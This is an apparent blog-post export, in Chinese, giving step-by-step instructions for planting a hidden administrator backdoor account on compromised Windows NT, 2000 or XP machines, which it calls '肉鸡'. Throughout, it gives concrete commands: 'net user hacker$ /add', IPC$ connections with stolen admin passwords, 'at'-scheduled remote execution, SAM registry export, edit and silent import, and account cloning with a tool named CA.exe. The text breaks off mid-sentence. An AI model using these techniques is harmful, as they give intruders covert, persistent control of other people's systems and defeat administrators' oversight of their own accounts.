{"id":309,"date":"2005-10-25T02:45:50","date_gmt":"2005-10-24T14:45:50","guid":{"rendered":""},"modified":"2005-10-25T02:45:50","modified_gmt":"2005-10-24T14:45:50","slug":"","status":"publish","type":"post","link":"https:\/\/www.mudone.com\/?p=309","title":{"rendered":"\u5efa\u7acb\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237"},"content":{"rendered":"<p>\u4e00\u3001\u5982\u4f55\u5728\u56fe\u5f62\u754c\u9762\u5efa\u7acb\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237<br \/>\n\u56fe\u5f62\u754c\u9762\u4e0b\u9002\u7528\u672c\u5730\u6216\u5f003389\u7ec8\u7aef\u670d\u52a1\u7684\u8089\u9e21\u4e0a\u3002\u4e0a\u9762\u6211\u63d0\u5230\u7684\u90a3\u4f4d\u4f5c\u8005\u8bf4\u7684\u65b9\u6cd5\u5f88\u597d\uff0c\u4f46\u662f\u8f83\u4e3a\u590d\u6742\uff0c<br \/>\n\u8fd8\u8981\u7528\u5230psu.exe(\u8ba9\u7a0b\u5e8f\u4ee5\u7cfb\u7edf\u7528\u6237\u8eab\u4efd\u8fd0\u884c\u7684\u7a0b\u5e8f\uff09\uff0c\u5982\u679c\u5728\u8089\u9e21\u4e0a\u7684\u8bdd\u8fd8\u8981\u4e0a\u4f20psu.exe\u3002<br \/>\n\u6211\u8bf4\u7684\u8fd9\u4e2a\u65b9\u6cd5\u5c06\u4e0d\u7528\u5230psu.exe\u8fd9\u4e2a\u7a0b\u5e8f\u3002\u56e0\u4e3awindows2000\u6709\u4e24\u4e2a\u6ce8\u518c\u8868\u7f16\u8f91\u5668:regedit.exe\u548cregedt32.exe\u3002<br \/>\nXP\u4e2dregedit.exe\u548cregedt32.exe\u5b9e\u4e3a\u4e00\u4e2a\u7a0b\u5e8f\uff0c\u4fee\u6539\u952e\u503c\u7684\u6743\u9650\u65f6\u5728\u53f3\u952e\u4e2d\u70b9\u201c\u6743\u9650\u201d\u6765\u4fee\u6539\u3002<br \/>\n\u5bf9regedit.exe\u6211\u60f3\u5927\u5bb6\u90fd\u5f88\u719f\u6089\uff0c\u4f46\u5374\u4e0d\u80fd\u5bf9\u6ce8\u518c\u8868\u7684\u9879\u952e\u8bbe\u7f6e\u6743\u9650\uff0c<br \/>\n\u800cregedt32.exe\u6700\u5927\u7684\u4f18\u70b9\u5c31\u662f\u80fd\u591f\u5bf9\u6ce8\u518c\u8868\u7684\u9879\u952e\u8bbe\u7f6e\u6743\u9650\u3002nt\/2000\/xp\u7684\u5e10\u6237\u4fe1\u606f<br \/>\n\u90fd\u5728\u6ce8\u518c\u8868\u7684HKEY_LOCAL_MACHINE\\SAM\\SAM\u952e\u4e0b\uff0c\u4f46\u662f\u9664\u4e86\u7cfb\u7edf\u7528\u6237SYSTEM\u5916\uff0c\u5176\u5b83\u7528\u6237\u90fd\u65e0\u6743\u67e5\u770b\u5230\u91cc\u9762\u7684\u4fe1\u606f\uff0c<br \/>\n<!--more-->\u56e0\u6b64\u6211\u9996\u5148\u7528regedt32.exe\u5bf9SAM\u952e\u4e3a\u6211\u8bbe\u7f6e\u4e3a\u201c\u5b8c\u5168\u63a7\u5236\u201d\u6743\u9650\u3002\u8fd9\u6837\u5c31\u53ef\u4ee5\u5bf9SAM\u952e\u5185\u7684\u4fe1\u606f\u8fdb\u884c\u8bfb\u5199\u4e86\u4e86\u3002\u5177\u4f53\u6b65\u805a\u5982\u4e0b\uff1a<\/p>\n<p>1\u3001\u5047\u8bbe\u6211\u4eec\u662f\u4ee5\u8d85\u7ea7\u7528\u6237administrator\u767b\u5f55\u5230\u5f00\u6709\u7ec8\u7aef\u670d\u52a1\u7684\u8089\u9e21\u4e0a\u7684\uff0c<br \/>\n\u9996\u5148\u5728\u547d\u4ee4\u884c\u4e0b\u6216\u5e10\u6237\u7ba1\u7406\u5668\u4e2d\u5efa\u7acb\u4e00\u4e2a\u5e10\u6237:hacker$,\u8fd9\u91cc\u6211\u5728\u547d\u4ee4\u884c\u4e0b\u5efa\u7acb\u8fd9\u4e2a\u5e10\u6237<\/p>\n<p>net user hacker$ 1234 \/add<\/p>\n<p>2\u3001\u5728\u5f00\u59cb\/\u8fd0\u884c\u4e2d\u8f93\u5165:regedt32.exe\u5e76\u56de\u8f66\u6765\u8fd0\u884cregedt32.exe\u3002<\/p>\n<p>3\u3001\u70b9\u201c\u6743\u9650\u201d\u4ee5\u540e\u4f1a\u5f39\u51fa\u7a97\u53e3<\/p>\n<p>\u70b9\u6dfb\u52a0\u5c06\u6211\u767b\u5f55\u65f6\u7684\u5e10\u6237\u6dfb\u52a0\u5230\u5b89\u5168\u680f\u5185\uff0c\u8fd9\u91cc\u6211\u662f\u4ee5administrator\u7684\u8eab\u4efd\u767b\u5f55\u7684\uff0c<br \/>\n\u6240\u4ee5\u6211\u5c31\u5c06administrator\u52a0\u5165\uff0c\u5e76\u8bbe\u7f6e\u6743\u9650\u4e3a\u201c\u5b8c\u5168\u63a7\u5236&quot;\u3002<br \/>\n\u8fd9\u91cc\u9700\u8981\u8bf4\u660e\u4e00\u4e0b:\u6700\u597d\u662f\u6dfb\u52a0\u4f60\u767b\u5f55\u7684\u5e10\u6237\u6216\u5e10\u6237\u6240\u5728\u7684\u7ec4\uff0c\u5207\u83ab\u4fee\u6539\u539f\u6709\u7684\u5e10\u6237\u6216\u7ec4\uff0c<br \/>\n\u5426\u5219\u5c06\u4f1a\u5e26\u6765\u4e00\u7cfb\u5217\u4e0d\u5fc5\u8981\u7684\u95ee\u9898\u3002\u7b49\u9690\u85cf\u8d85\u7ea7\u7528\u6237\u5efa\u597d\u4ee5\uff0c\u518d\u6765\u8fd9\u91cc\u5c06\u4f60\u6dfb\u52a0\u7684\u5e10\u6237\u5220\u9664\u5373\u53ef\u3002<\/p>\n<p>4\u3001\u518d\u70b9\u201c\u5f00\u59cb\u201d\u2192\u201c\u8fd0\u884c\u201d\u5e76\u8f93\u5165&quot;regedit.exe&quot; \u56de\u8f66,\u542f\u52a8\u6ce8\u518c\u8868\u7f16\u8f91\u5668regedit.exe\u3002<\/p>\n<p>\u6253\u5f00\u952e\uff1aHKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names\\hacker$&quot;<\/p>\n<p>5\u3001\u5c06\u9879hacker$\u300100000409\u3001000001F4\u5bfc\u51fa\u4e3ahacker.reg\u3001409.reg\u30011f4.reg\uff0c<br \/>\n\u7528\u8bb0\u4e8b\u672c\u5206\u522b\u6253\u8fd9\u51e0\u4e2a\u5bfc\u51fa\u7684\u6587\u4ef6\u8fdb\u884c\u7f16\u8f91\uff0c\u5c06\u8d85\u7ea7\u7528\u6237\u5bf9\u5e94\u7684\u9879000001F4\u4e0b\u7684\u952e&quot;F&quot;\u7684\u503c\u590d\u5236\uff0c<br \/>\n\u5e76\u8986\u76d6hacker$\u5bf9\u5e94\u7684\u987900000409\u4e0b\u7684\u952e&quot;F&quot;\u7684\u503c,\u7136\u540e\u518d\u5c0600000409.reg\u4e0ehacker.reg\u5408\u5e76\u3002<\/p>\n<p>6\u3001\u5728\u547d\u4ee4\u884c\u4e0b\u6267\u884cnet user hacker$ \/del\u5c06\u7528\u6237hacker$\u5220\u9664\uff1anet user hacker$ \/del<\/p>\n<p>7\u3001\u5728regedit.exe\u7684\u7a97\u53e3\u5185\u6309F5\u5237\u65b0\uff0c\u7136\u540e\u6253\u6587\u4ef6-\u5bfc\u5165\u6ce8\u518c\u8868\u6587\u4ef6\u5c06\u4fee\u6539\u597d\u7684hacker.reg\u5bfc\u5165\u6ce8\u518c\u8868\u5373\u53ef<\/p>\n<p>8\u3001\u5230\u6b64\uff0c\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237hacker$\u5df2\u7ecf\u5efa\u597d\u4e86\uff0c\u7136\u540e\u5173\u95edregedit.exe\u3002\u5728regedt32.exe\u7a97\u53e3\u5185\u628a<br \/>\nHKEY_LOCAL_MACHINE\\SAM\\SAM\u952e\u6743\u9650\u6539\u56de\u539f\u6765\u7684\u6837\u5b50\uff08\u53ea\u8981\u5220\u9664\u6dfb\u52a0\u7684\u5e10\u6237administrator\u5373\u53ef\uff09\u3002<\/p>\n<p>9\u3001\u6ce8\u610f\uff1a\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237\u5efa\u597d\u540e\uff0c\u5728\u5e10\u6237\u7ba1\u7406\u5668\u770b\u4e0d\u5230hacker$\u8fd9\u4e2a\u7528\u6237\uff0c\u5728\u547d\u4ee4\u884c\u7528\u201cnet user\u201d<br \/>\n\u547d\u4ee4\u4e5f\u770b\u4e0d\u5230\uff0c\u4f46\u662f\u8d85\u7ea7\u7528\u6237\u5efa\u7acb\u4ee5\u540e\uff0c\u5c31\u4e0d\u80fd\u518d\u6539\u5bc6\u7801\u4e86\uff0c\u5982\u679c\u7528net user\u547d\u4ee4\u6765\u6539hacker$\u7684\u5bc6\u7801\u7684\u8bdd\uff0c<br \/>\n\u90a3\u4e48\u5728\u5e10\u6237\u7ba1\u7406\u5668\u4e2d\u5c06\u53c8\u4f1a\u770b\u8fd9\u4e2a\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237\u4e86\uff0c\u800c\u4e14\u4e0d\u80fd\u5220\u9664\u3002<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\n\u4e8c\u3002\u5982\u4f55\u5728\u547d\u4ee4\u884c\u4e0b\u8fdc\u7a0b\u5efa\u7acb\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237<\/p>\n<p>\u5728\u8fd9\u91cc\u5c06\u7528at\u7684\u547d\u4ee4\uff0c\u56e0\u4e3a\u7528at\u4ea7\u751f\u7684\u8ba1\u5212\u4efb\u52a1\u662f\u4ee5\u7cfb\u7edf\u8eab\u4efd\u8fd0\u884c\u7684\uff0c\u6240\u4ee5\u4e5f\u7528\u4e0d\u5230psu.exe\u7a0b\u5e8f\u3002<br \/>\n\u4e3a\u4e86\u80fd\u591f\u4f7f\u7528at\u547d\u4ee4\uff0c\u8089\u9e21\u5fc5\u987b\u5f00\u6709schedule\u7684\u670d\u52a1\uff0c\u5982\u679c\u6ca1\u6709\u5f00\u542f\uff0c\u53ef\u7528\u6d41\u5149\u91cc\u5e26\u7684\u5de5\u5177netsvc.exe\u6216sc.exe\u6765\u8fdc\u7a0b\u542f\u52a8\uff0c<br \/>\n\u5f53\u7136\u5176\u65b9\u6cd5\u4e5f\u53ef\u4ee5\uff0c\u53ea\u8981\u80fd\u542f\u52a8schedule\u670d\u52a1\u5c31\u884c\u3002<\/p>\n<p>\u5bf9\u4e8e\u547d\u4ee4\u884c\u65b9\u5f0f\uff0c\u4f60\u53ef\u4ee5\u91c7\u7528\u5404\u79cd\u8fde\u63a5\u65b9\u5f0f\uff0c\u5982\u7528SQLexec\u8fde\u63a5MSSQL\u76841433\u7aef\u53e3\uff0c\u4e5f\u53ef\u4ee5\u7528telnet\u670d\u52a1\uff0c<br \/>\n\u53ea\u8981\u4ee5\u4f60\u80fd\u5f97\u5230\u4e00\u4e2acmdshell\uff0c\u5e76\u4e14\u6709\u8fd0\u884cat\u547d\u4ee4\u7684\u6743\u9650\u5c31\u53ef\u4ee5\u3002<\/p>\n<p>1\u3001\u9996\u5148\u627e\u5230\u4e00\u53f0\u8089\u9e21\uff0c\u81f3\u4e8e\u5982\u4f55\u6765\u627e\u90a3\u4e0d\u662f\u6211\u8fd9\u91cc\u6240\u8bf4\u7684\u8bdd\u9898\u3002\u8fd9\u91cc\u5148\u5047\u8bbe\u627e\u5230\u4e00\u53f0\u8d85\u7ea7\u7528\u6237\u4e3aadministrator,<br \/>\n\u5bc6\u7801\u4e3a12345678\u7684\u8089\u9e21\uff0c\u73b0\u5728\u6211\u4eec\u5f00\u59cb\u5728\u547d\u4ee4\u884c\u4e0b\u8fdc\u7a0b\u4e3a\u5b83\u5efa\u7acb\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237\u3002\uff08\u4f8b\u5b50\u4e2d\u7684\u4e3b\u673a\u662f\u6211\u7684\u5c40\u57df\u7f51\u5185\u7684\u4e00\u53f0\u4e3b\u673a\uff0c<br \/>\n\u6211\u5c06\u5b83\u7684ip\u5730\u5740\u6539\u4e3a13.50.97.238,\uff0c\u8bf7\u52ff\u5728\u4e92\u8054\u7f51\u4e0a\u5bf9\u53f7\u5165\u5ea7,\u4ee5\u514d\u9a9a\u6270\u6b63\u5e38\u7684ip\u5730\u5740\u3002\uff09<br \/>\n2\u3001\u5148\u4e0e\u8089\u9e21\u5efa\u7acb\u8fde\u63a5,\u547d\u4ee4\u4e3a: net use \\\\13.50.97.238\\ipc$ &quot;12345678&quot; \/user:&quot;administrator<\/p>\n<p>3\u3001\u7528at\u547d\u4ee4\u5728\u8089\u9e21\u4e0a\u5efa\u7acb\u4e00\u4e2a\u7528\u6237(\u5982\u679cat\u670d\u52a1\u6ca1\u6709\u542f\u52a8\uff0c\u53ef\u7528\u5c0f\u6995\u7684netsvc.exe\u6216sc.exe\u6765\u8fdc\u7a0b\u542f\u52a8):at \\\\13.50.97.238 12:51<\/p>\n<p>c:\\winnt\\system32\\net.exe user hacker$ 1234 \/add<\/p>\n<p>\u5efa\u7acb\u8fd9\u4e2a\u52a0\u6709$\u7b26\u7684\u7528\u6237\u540d\uff0c\u662f\u56e0\u4e3a\u52a0\u6709$\u7b26\u540e\uff0c\u547d\u4ee4\u884c\u4e0b\u7528net user\u5c06\u4e0d\u663e\u793a\u8fd9\u4e2a\u7528\u6237\uff0c\u4f46\u5728\u5e10\u6237\u7ba1\u7406\u5668\u5374\u80fd\u770b\u5230\u8fd9\u4e2a\u7528\u6237\u3002<\/p>\n<p>4\u3001\u540c\u6837\u7528at\u547d\u4ee4\u5bfc\u51faHKEY_LOCAL_MACHINE\\sam\\sam\\Domains\\account\\users\u4e0b\u952e\u503c\uff1aat \\\\13.50.97.238 12:55<\/p>\n<p>c:\\winnt\\regedit.exe \/e hacker.reg HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\\users\\<\/p>\n<p>\/e \u662fregedit.exe\u7684\u53c2\u6570\uff0c\u5728_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\\users\\\u8fd9\u4e2a\u952e\u7684\u4e00\u5b9a\u8981\u4ee5\\\u7ed3\u5c3e\u3002<br \/>\n\u5fc5\u8981\u7684\u60c5\u51b5\u4e0b\u53ef\u4ee5\u7528\u5f15\u53f7\u5c06&quot;c:\\winnt\\regedit.exe \/e hacker.reg HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\\users\\&quot;\u5f15\u8d77\u6765\u3002<\/p>\n<p>5\u3001\u5c06\u8089\u9e21\u4e0a\u7684hacker.reg\u4e0b\u8f7d\u5230\u672c\u673a\u4e0a\u7528\u8bb0\u4e8b\u672c\u6253\u5f00\u8fdb\u884c\u7f16\u8f91\u547d\u4ee4\u4e3a\uff1acopy \\\\13.50.97.238\\admin$\\system32\\hacker.reg<\/p>\n<p>c:\\hacker.reg<\/p>\n<p>\u4fee\u6539\u7684\u65b9\u6cd5\u56fe\u5f62\u754c\u4e2d\u5df2\u7ecf\u4ecb\u7ecd\u8fc7\u4e86\uff0c\u8fd9\u91cc\u5c31\u4e0d\u4f5c\u4ecb\u7ecd\u4e86\u3002<\/p>\n<p>6\u3001\u518d\u5c06\u7f16\u8f91\u597d\u7684hacker.reg\u62f7\u56de\u8089\u9e21\u4e0a copy c:\\hacker.reg \\\\13.50.97.238\\admin$\\system32\\hacker1.reg<\/p>\n<p>7\u3001\u67e5\u770b\u8089\u9e21\u65f6\u95f4\uff1anet time \\\\13.50.97.238 \u7136\u540e\u7528at\u547d\u4ee4\u5c06\u7528\u6237hacker$\u5220\u9664:<\/p>\n<p>at \\\\13.50.97.238 13:40 net user hacker$ \/del<\/p>\n<p>8\u3001\u9a8c\u8bc1hacker$\u662f\u5426\u5220\u9664:\u7528<\/p>\n<p>net use \\\\13.50.97.238 \/del \u65ad\u5f00\u4e0e\u8089\u9e21\u7684\u8fde\u63a5\u3002<\/p>\n<p>net use \\\\13.50.97.238\\ipc$ &quot;1234&quot; \/user:&quot;hacker$&quot; \u7528\u5e10\u6237hacker$\u4e0e\u8089\u9e21\u8fde\u63a5\uff0c\u4e0d\u80fd\u8fde\u63a5\u8bf4\u660e\u5df2\u5220\u9664\u3002<\/p>\n<p>9\u3001\u518d\u4e0e\u8089\u9e21\u5efa\u7acb\u8fde\u63a5\uff1anet use \\\\13.50.97.238\\ipc$ &quot;12345678&quot; \/user:&quot;administrator&quot;<\/p>\n<p>\u518d\u53d6\u5f97\u8089\u9e21\u65f6\u95f4\uff0c\u7528at\u547d\u4ee4\u5c06\u62f7\u56de\u8089\u9e21\u7684hacker1.reg\u5bfc\u5165\u8089\u9e21\u6ce8\u518c\u8868:<\/p>\n<p>at \\\\13.50.97.238 13:41 c:\\winnt\\regedit.exe \/s hacker1.reg<\/p>\n<p>regedit.exe\u7684\u53c2\u6570\/s\u662f\u6307\u5b89\u9759\u6a21\u5f0f\u3002<\/p>\n<p>10\u3001\u518d\u9a8c\u8bc1hacker$\u662f\u5426\u5df2\u5efa\u7acb\uff0c\u65b9\u6cd5\u540c\u4e0a\u9762\u9a8c\u8bc1hacker$\u662f\u5426\u88ab\u5220\u9664\u4e00\u6837\u3002<\/p>\n<p>11\u3001\u518d\u9a8c\u8bc1\u7528\u6237hacker$\u662f\u5426\u6709\u8bfb\u3001\u5199\u3001\u5220\u7684\u6743\u9650\uff0c\u5982\u679c\u4e0d\u653e\u5fc3\uff0c\u4f60\u8fd8\u53ef\u9a8c\u8bc1\u662f\u5426\u80fd\u5efa\u7acb\u5176\u5b83\u5e10\u6237\u3002<\/p>\n<p>12\u3001\u901a\u8fc711\u53ef\u4ee5\u65ad\u5b9a\u7528\u6237hacker$\u5177\u6709\u8d85\u7ea7\u7528\u6237\u6743\u9650\uff0c\u56e0\u4e3a\u6700\u521d\u6211\u7528at\u547d\u4ee4\u5efa\u7acb\u5b83\u7684\u65f6\u5019\u662f\u4e00\u4e2a\u666e\u901a\u7528\u6237\uff0c<br \/>\n\u800c\u73b0\u5728\u5374\u5177\u6709\u8fdc\u7a0b\u8bfb\u3001\u5199\u3001\u5220\u7684\u6743\u9650\u3002<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\n\u4e09\u3001\u5982\u679c\u8089\u9e21\u6ca1\u6709\u5f003389\u7ec8\u7aef\u670d\u52a1\uff0c\u800c\u6211\u53c8\u4e0d\u60f3\u7528\u547d\u4ee4\u884c\uff0c\u600e\u4e48\u529e\uff1f<br \/>\n\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u4f60\u4e5f\u53ef\u4ee5\u7528\u754c\u9762\u65b9\u5f0f\u6765\u8fdc\u7a0b\u4e3a\u8089\u9e21\u5efa\u7acb\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237\u3002\u56e0\u4e3aregedit.exe\u3001<br \/>\nregedt32.exe\u90fd\u6709\u8fde\u63a5\u7f51\u7edc\u6ce8\u518c\u8868\u7684\u529f\u80fd\uff0c\u4f60\u53ef\u4ee5\u7528regedt32.exe\u6765\u4e3a\u8fdc\u7a0b\u4e3b\u673a\u7684\u6ce8\u518c\u8868\u9879\u8bbe\u7f6e\u6743\u9650\uff0c<br \/>\n\u7528regedit.exe\u6765\u7f16\u8f91\u8fdc\u7a0b\u6ce8\u518c\u8868\u3002\u5e10\u6237\u7ba1\u7406\u5668\u4e5f\u6709\u4e00\u9879\u8fde\u53e6\u4e00\u53f0\u8ba1\u7b97\u673a\u7684\u529f\u80fd\uff0c\u4f60\u53ef\u4ee5\u7528\u5e10\u6237\u7ba1\u7406\u5668\u4e3a\u8fdc\u7a0b\u4e3b\u673a\u5efa\u7acb\u548c\u5220\u9664\u5e10\u6237\u3002<br \/>\n\u5177\u4f53\u6b65\u805a\u4e0e\u4e0a\u9762\u4ecb\u7ecd\u7684\u76f8\u4f3c\uff0c\u6211\u5c31\u4e0d\u591a\u8bf4\u4e86\uff0c\u53ea\u5b83\u7684\u901f\u5ea6\u5b9e\u5728\u662f\u4ee4\u4eba\u96be\u4ee5\u5fcd\u53d7\u3002<\/p>\n<p>\u4f46\u662f\u8fd9\u91cc\u6709\u4e24\u4e2a\u524d\u63d0\uff1a<\/p>\n<p>1\u3001\u5148\u7528net use \\\\\u8089\u9e21ip\\ipc$ &quot;\u5bc6\u7801&quot; \/user:&quot;\u8d85\u7ea7\u7528\u6237\u540d&quot;\u6765\u4e0e\u8fdc\u7a0b\u4e3b\u673a\u5efa\u7acb\u8fde\u63a5\u4ee5\u540e\uff0c<br \/>\n\u624d\u80fd\u7528regedit.exe regedt32.exe\u53ca\u5e10\u6237\u7ba1\u7406\u5668\u4e0e\u8fdc\u7a0b\u4e3b\u673a\u8fde\u63a5\u3002<\/p>\n<p>2\u3001\u8fdc\u7a0b\u4e3b\u673a\u5fc5\u987b\u5f00\u542f\u8fdc\u7a0b\u6ce8\u518c\u8868\u670d\u52a1\uff08\u6ca1\u6709\u5f00\u542f\u7684\u8bdd\uff0c\u4f60\u4e5f\u53ef\u4ee5\u8fdc\u7a0b\u5f00\u542f\uff0c\u56e0\u4e3a\u4f60\u6709\u8d85\u7ea7\u7528\u6237\u7684\u5bc6\u7801\u4e86\uff09\u3002<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\n\u56db\u3001\u5229\u7528\u88ab\u7981\u7528\u7684\u5e10\u6237\u5efa\u7acb\u9690\u85cf\u7684\u8d85\u7ea7\u7528\u6237\uff1a<\/p>\n<p>\u6211\u4eec\u53ef\u4ee5\u7528\u8089\u9e21\u4e0a\u88ab\u7981\u6b62\u7684\u7528\u6237\u6765\u5efa\u7acb\u9690\u85cf\u7684\u8d85\u7ec4\u7528\u6237.\u65b9\u6cd5\u5982\u4e0b:<\/p>\n<p>1\uff0e\u60f3\u529e\u6cd5\u67e5\u770b\u6709\u54ea\u4e9b\u7528\u6237\u88ab\u7ec6\u5fc3\u7684\u7ba1\u7406\u5458\u7981\u6b62\uff0c\u4e00\u822c\u60c5\u51b5\u4e0b\uff0c\u6709\u4e9b\u7ba1\u7406\u5458\u51fa\u4e8e\u5b89\u5168\u8003\u8651\uff0c\u901a\u5e38\u4f1a\u5c06guest\u7981\u7528\uff0c<br \/>\n\u5f53\u7136\u4e86\u4f1a\u7981\u7528\u5176\u5b83\u7528\u6237\u3002\u5728\u56fe\u5f62\u754c\u9762\u4e0b\uff0c\u975e\u5e38\u5bb9\u6613\uff0c\u53ea\u8981\u5728\u5e10\u6237\u7ba1\u7406\u5668\u4e2d\u5c31\u53ef\u4ee5\u770b\u5230\u88ab\u7981\u7528\u7684\u5e10\u6237\u4e0a\u6709\u4e00\u4e2a\u7ea2\u53c9\uff1b<br \/>\n\u800c\u5728\u547d\u4ee4\u884c\u4e0b\uff0c\u6211\u8fd8\u6ca1\u6709\u60f3\u5230\u597d\u7684\u529e\u6cd5\uff0c\u53ea\u80fd\u5728\u547d\u4ee4\u884c\u4e0b\u7528\u547d\u4ee4\uff1a&quot;net user \u7528\u6237\u540d&quot;\u4e00\u4e2a\u4e00\u4e2a\u6765\u67e5\u770b\u7528\u6237\u662f\u5426\u88ab\u7981\u7528\u3002<\/p>\n<p>2\uff0e\u5728\u8fd9\u91cc\uff0c\u6211\u4eec\u5047\u8bbe\u7528\u6237hacker\u88ab\u7ba1\u7406\u5458\u7981\u7528\u3002\u9996\u5148\uff0c\u6211\u5148\u7528\u5c0f\u6995\u7684\u8d85\u7ec4\u7528\u6237\u514b\u9686\u7a0b\u5e8fCA.exe\uff0c\u5c06\u88ab\u7981\u7528\u7684\u7528\u6237hacker<br \/>\n\u514b\u9686\u6210\u8d85\u7ea7\u7528\u6237\uff08\u514b\u9686\u4e4b\u540e\uff0c\u88ab\u7981\u7528\u7684\u7528\u6237hacker\u5c31\u4f1a\u81ea\u52a8\u88ab\u6fc0\u6d3b\u4e86\uff09: CA.EXE \\\\\u8089\u9e21ip Administrator \u8d85\u7ea7\u7528\u6237\u5bc6\u7801<br \/>\nhacher hacher\u5bc6\u7801\u3002<\/p>\n<p>3\uff0e\u5982\u679c\u4f60\u73b0\u5728\u4e00\u4e2acmdshell\uff0c\u5982\u5229\u7528telnet\u670d\u52a1\u6216SQLEXEC\u8fde\u63a5\u8089\u9e21\u7684msSQL\u7684\u9ed8\u8ba4\u7aef\u53e31433\u5f97\u5230\u7684shell\u90fd\u53ef\u4ee5\uff0c<br \/>\n\u8fd9\u65f6\u4f60\u53ea\u8981\u8f93\u5165\u547d\u4ee4\uff1a<\/p>\n<p>net user hacker \/active:no \u8fd9\u6837\u7528\u6237hacker\u5c31\u88ab\u7981\u7528\u4e86\uff08\u81f3\u5c11\u8868\u9762\u4e0a\u662f\u8fd9\u6837\u7684\uff09\uff0c<br \/>\n\u5f53\u7136\u4f60\u4e5f\u53ef\u4ee5\u5c06\u7528\u6237hacher\u6362\u6210\u5176\u5b83\u7684\u88ab\u7981\u7528\u7684\u7528\u6237\u3002<\/p>\n<p>4\uff0e\u8fd9\u65f6\u5982\u679c\u4f60\u5728\u56fe\u5f62\u754c\u9762\u4e0b\u770b\u5e10\u6237\u7ba1\u7406\u5668\u4e2d\u7684\u7528\u6237\u65f6,\u4f1a\u53d1\u73b0\u7528\u6237hacker\u88ab\u7981\u7528\u4e86\uff0c<br \/>\n\u4f46\u4e8b\u5b9e\u4e0a\u662f\u8fd9\u6837\u7684\u5417\uff1f\u4f60\u7528\u8fd9\u4e2a\u88ab\u7981\u7528\u7684\u7528\u6237\u8fde\u63a5\u4e00\u4e0b\u8089\u9e21\u770b\u770b\u662f\u5426\u80fd\u8fde\u4e0a\uff1f<br \/>\n\u7528\u547d\u4ee4\uff1anet user \\\\\u8089\u9e21ip\\ipc$ &quot;hacker\u5bc6\u7801&quot; \/user:&quot;hacker&quot; \u8fde\u4e00\u8fde\u770b\u770b\u3002<br \/>\n\u6211\u53ef\u4ee5\u544a\u8bc9\u5927\u5bb6\uff0c\u7ecf\u8fc7\u6211\u591a\u6b21\u8bd5\u9a8c\uff0c\u6b21\u6b21\u90fd\u80fd\u6210\u529f\uff0c\u800c\u4e14\u8fd8\u662f\u8d85\u7ea7\u7528\u6237\u6743\u9650\u3002<\/p>\n<p>5\uff0e\u5982\u679c\u6ca1\u6709cmdshell\u600e\u4e48\u529e\uff1f\u4f60\u53ef\u4ee5\u6211\u4e0a\u9762\u4ecb\u7ecd\u7684at\u547d\u4ee4\u6765\u7981\u7528\u7528\u6237hacker;<br \/>\n\u547d\u4ee4\u683c\u5f0f\uff1aat \\\\\u8089\u9e21ip \u65f6\u95f4 net user hacker \/active:no<\/p>\n<p>6\uff0e\u539f\u7406\uff1a\u5177\u4f53\u7684\u9ad8\u6df1\u7684\u539f\u7406\u6211\u4e5f\u8bf4\u4e0d\u4e0a\u6765\uff0c\u6211\u53ea\u80fd\u4ece\u6700\u7b80\u5355\u7684\u8bf4\u3002<br \/>\n\u4f60\u5148\u5728\u56fe\u5f62\u754c\u9762\u4e0b\u5728\u5e10\u6237\u7ba1\u7406\u5668\u4e2d\u7981\u7528\u4e00\u4e0b\u8d85\u7ea7\u7528\u6237administrator\u770b\u770b\uff0c<br \/>\n\u80af\u5b9a\u4f1a\u5f39\u51fa\u4e00\u5bf9\u8bdd\u6846\uff0c\u5e76\u7981\u6b62\u4f60\u7ee7\u7eed\u7981\u7528\u8d85\u7ea7\u7528\u6237administrator\uff0c\u540c\u6837\uff0c<br \/>\n\u56e0\u4e3a\u5728\u514b\u9686\u65f6\uff0chacker\u5728\u6ce8\u518c\u8868\u7684&quot;F&quot;\u952e\u88ab\u8d85\u7ea7\u7528\u6237administrator\u5728\u6ce8\u518c\u8868\u7684&quot;F&quot;\u952e\u6240\u66ff\u4ee3\uff0c<br \/>\n\u56e0\u800chacker\u5c31\u5177\u6709\u4e86\u8d85\u7ea7\u7528\u6237\u7684\u6743\u9650\u4e86\uff0c\u4f46\u662f\u7531\u4e8ehacker\u5728\u6ce8\u518c\u8868\u5185&quot;C&quot;\u5065\u8fd8\u662f\u539f\u6765\u7684&quot;C&quot;\u952e\uff0c<br \/>\n\u6240\u4ee5hacker\u8fd8\u662f\u4f1a\u88ab\u7981\u7528\uff0c\u4f46\u662f\u5b83\u7684\u8d85\u7ea7\u7528\u6237\u6743\u9650\u5374\u4e0d\u4f1a\u88ab\u7981\u7528\uff0c\u56e0\u6b64\u88ab\u7981\u7528\u7684\u7528\u6237hacker\u8fd8\u662f\u53ef\u4ee5\u8fde\u63a5\u8089\u9e21\uff0c<br 